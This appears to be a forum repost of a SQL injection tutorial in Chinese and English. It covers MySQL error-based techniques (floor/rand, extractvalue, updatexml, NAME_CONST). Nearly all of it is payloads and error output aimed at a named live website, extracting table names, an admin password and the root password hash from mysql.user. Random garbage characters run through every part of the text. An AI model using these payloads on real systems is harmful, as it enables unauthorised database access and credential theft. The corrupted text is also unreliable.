|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:" \" m' {' H' ` i
首先进行正常查询: mysql> select * from article where id = 1;) \2 E: y: N: j" |2 @+ T- i
+—-+——-+———+( ]" u& n0 Y% a! |: j8 E( U
| id | title | content |
( ^# v/ O4 h# B0 E: O+—-+——-+———+5 Q& t) t2 f: X7 Y4 y8 t
| 1 | test | do it |
8 F; _# |5 ~2 v- p1 N, ^: F+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4 L0 I) Q4 I6 ]4 I v: Q3 j- KERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。- R1 T) a* ~& |. S7 l* @( V
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
% T, G: l5 h% q% u. YERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));9 m2 K0 Z6 e) O7 p/ o$ @. J
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
, F) z4 A. Y7 S" q" t8 R测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–3 ]$ k. V6 K N- g; C5 w
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
; ]% u8 L+ L' A0 S* G, f, a& ]! j. |. S! e- M% B: z. C: q
再收集:
' O! [$ Q$ Q) c7 Lhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) % C( F. G( z& d4 R
' u& V* y9 A8 s6 S' ]* RError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’, z; ?8 F. t/ Y$ c8 S
( P- e2 [: I0 ?0 m' ^$ Ohttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)5 p- o% c J4 o& z5 u
/ _' s! K& d( M5 l( K: i
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
" U( t, R+ [4 g T- w% R) q) u8 Y3 ?" X
MYSQL高版本报错注入技巧-利用NAME_CONST注入. T. Y c4 l. h
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. ! I4 Z1 h! b8 w2 V) i% h8 d# U( p
9 N6 x$ b7 @5 g
7 ?$ g, _& y& H7 b6 R! l相关信息; Q2 U3 [/ V7 I8 F! Y M: @
0 I( y! U" V5 W& S8 @6 S2 GNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
* l) B: F. L; \5 Y$ w3 p
- N, m9 n9 R, J, E+ C6 d+ x* HCode:
- i5 M3 S3 ^3 \+ ^NAME_CONST(DATA, VALUE)- f- n7 T9 |" i
- j; h$ h+ J2 M) V' R! G+ \Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.1 o: t, L% [0 s! `
3 {8 s0 _/ [% Y) | a, C( }
SELECT NAME_CONST('TEST', 1). b' v1 t6 T) n! g
: P& Y4 @# J) z8 c- B
. _. h7 d8 p$ f% ]$ k% T
! o8 l; l. `! V2 K|---------------|6 f1 @$ t" g0 l. o
| TEST |6 T4 C6 E1 i) g
| |5 r+ o6 B6 X7 ~1 V, V
|---------------|
; t4 D1 {+ W; s: Y' z| 1 | X: B3 d- C# i/ P; p1 f. [
| |
# \& T: N. l. V& S" C+ \' B|---------------|# [# H* v# J/ p! w- \
3 I$ ?5 P) v8 b1 P9 b' Z4 p7 z3 S# e1 W
0 \% L0 Y+ O) n& k; K1 w+ v" o7 \6 e: o8 C6 k
http://dev.mysql.com/doc/refman/5.0/en/m...name-const- g) `; m. { T- e6 S& r7 S- A
Intro to MySQL Variables
' s6 S+ J' Z) d/ [% z& c! z
) `6 G2 W+ }* T0 A" POnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
9 t R" ^' b1 R5 A
2 c: h! y' J8 K/ UCode:1 ~; V. Z; b8 d2 T2 s
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
* z! v8 g+ }, u
- t! N8 T' e* A
6 R9 Q2 { j' [) F6 S$ R0 ~' b! ~* m* X
3 ~8 {0 x1 ~+ o+ \/ n7 v+ b
- L- [6 O V! X. X' j: R& u
Code:
7 W. I9 h! `. Q" T- U8 v" Dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--0 i* ]* b. f6 E( a- a7 e4 `" j
3 x6 i+ a6 K* \: T# \# Y
3 a% o) T8 O; [# O2 m
VAR = Your MySQL variable.( h! J1 _9 K! ? _
% z- N: ?2 C0 C
MySQL 5.1.3 Server System Variables6 r3 A9 z2 y6 y+ o- s
' g) V6 V0 K Y* D& x+ ULet's try it out on my site..
8 ?6 i, C8 r; S; W, d! F- k& S& {0 m; k. h6 h3 ?3 B; n4 _7 M
Code:# v7 g3 l* ~# D2 x
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
& c3 z3 ?/ y- m: c! J2 @
! w. y3 t; ^& }% T( z( E+ MErroruplicate column name '5.0.27-community-nt'8 C! n y$ w: K; p; f6 A, s8 @+ K- K) A E
6 s! b1 w7 m- B3 p! x1 t% Q p) L5 T3 g4 |! r8 v! Y: g
- b s* b+ G; p6 f3 m
# a+ g# l N$ r+ i6 I: o( G! I* y
% P5 D1 m! Z9 C M7 i, r2 p% iNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
, m' k; N/ i3 J2 W* S. g% E5 P8 J
Data Extraction
. V- |" [4 ~; |% r# ^+ O" f4 a! a6 W6 }- x
Code:. X5 a) P2 s5 c4 F) S
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--# y! e) G6 U6 J5 Q- f( H
7 Y; c, A% ~# ]9 q& ~, E0 N3 P. ~1 {
* J/ h3 ]" e# c* D8 L. ^4 |6 H# ]We should get a duplicate column 1 error.../ v! l" O3 g' W; G$ _- V
' ?7 o6 X& M! d0 H7 y- gCode:/ Y* X. b z7 D7 I2 G
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- u) j3 _8 Y2 X3 b
" }7 H4 i( C0 R$ f, g B' eErroruplicate column name '1
. J% P+ A6 k1 w6 G6 N# }% e/ Z' h7 ~; i& s" L2 A, _5 J
+ x2 k$ c# K8 v0 v: W8 Q7 W
& c# @$ \! z8 V% n$ t* {' j" I3 [
( u- t$ X# Q. t
4 _( m$ _' J; y8 R/ B- c. G
* E# Q8 E$ N) t1 t0 f+ YNow let's get the tables out this bitch..: D/ ?4 E2 M& E: L0 h) h
* _* [, l$ h4 M3 S: B
Code:
' a! e' [/ X3 u, h& T+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
1 |; J! H; R1 b
1 E. X! Y. y9 n' ^# Y5 i8 {9 {! e5 J% i# S& q) J, M7 P$ M' F
Let's see if it works here, if it does, we can go on and finish the job.# C; i6 n3 \4 [9 H" D- R4 V1 a
$ n7 l8 f7 ?6 Y$ b p: C
Code:) T- Z" N5 L6 Q4 g5 V
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--9 O8 Z% d5 g+ z: g
' ^) v) }' Y4 o$ A' u5 `6 g
. F2 z& u% X$ F
Erroruplicate column name 'com_admanage
$ b1 l5 G5 b0 e' _2 [3 ~/ f$ z6 {- l& b6 j/ L# v+ E8 `
0 z) Z. S' {* B( y5 @+ P& G
2 C h) H/ l9 j/ Y: u- G
' k2 ~. E% {, Y* ~+ E+ W# d, x' i, y: o0 B
$ @/ K2 Z& l5 B5 JNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.9 ?/ G) T% j* G" D9 D% n- s8 v8 }* s
4 o2 Q& R) i- a2 ZLet's get the columns out of the user table..
+ h' r! @2 P/ A, y' u# d. F, ` N7 i# r3 G
Code:* N+ Y- n! ]6 [
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
( c- I6 C1 T/ t0 A, X& C8 K
, k7 l* A2 B+ R! ]6 d: L+ I9 F9 d7 j t8 N' Q
So mine looks like this, and I get the duplicate column name 'Host'.
" s1 X$ Q! K \( O
0 h9 U) N+ x6 K" QCode:; V" j$ E1 |9 C3 t% M7 }; J
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
, m0 N" c" R& ?( E' \& L+ S$ [! z. f, r- t3 v! M* j& e
Erroruplicate column name 'Host'6 {8 M1 [0 {+ H: F* ~
, _2 S( c4 m8 _5 I% V$ H) |, O X9 q8 i* Y7 H
; i" \9 U. |1 e/ q6 h; W$ I
7 k; ?6 E* Y4 h* _
7 t( e; Z! ^8 }0 a. i1 S7 C; C6 C5 u+ y1 u
Woot, time to finish this bitch off.9 w; {5 H7 o. W. c& p6 Q+ n. T2 G
1 @9 R1 W) g5 \9 _7 S/ _- q$ cCode:
; @; k) S5 M+ F( |0 k! c+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
& s. ?" y! ]7 I. M6 F! w' R- _. J* H% V; L: C/ C ^; @
; A8 e. @+ Z1 R& Z5 [+ G+ C
So mine looks like this...
8 f( z' ]7 _7 U( P& @' J1 Y
" R2 m, a% ~* H4 m: x# _Code:7 a* |+ X+ T! z, _' y3 K$ @. q: I
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--5 ]7 A: \ G3 R% j
9 n5 @- { Y1 }4 M! t- a! g' N
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
! z9 ]9 N* G* t( {! P* `2 j- P9 h* o2 `. B; x7 ?
% g% b0 T* X j/ S- F- X
( `1 w. B! ]* C# D0 ~* g& J0 O
" W/ t, h6 Z) e% a, N% n% H5 F% A3 f5 Z1 k( y
& Z" _& Q2 D9 g' z, B5 DAnd there we have it, thanks for reading.
1 T6 [: r! l# d- v4 E# U( w8 c4 x4 f0 V) y6 T
|
发表于 2015-11-11 19:03:37
收藏
支持
反对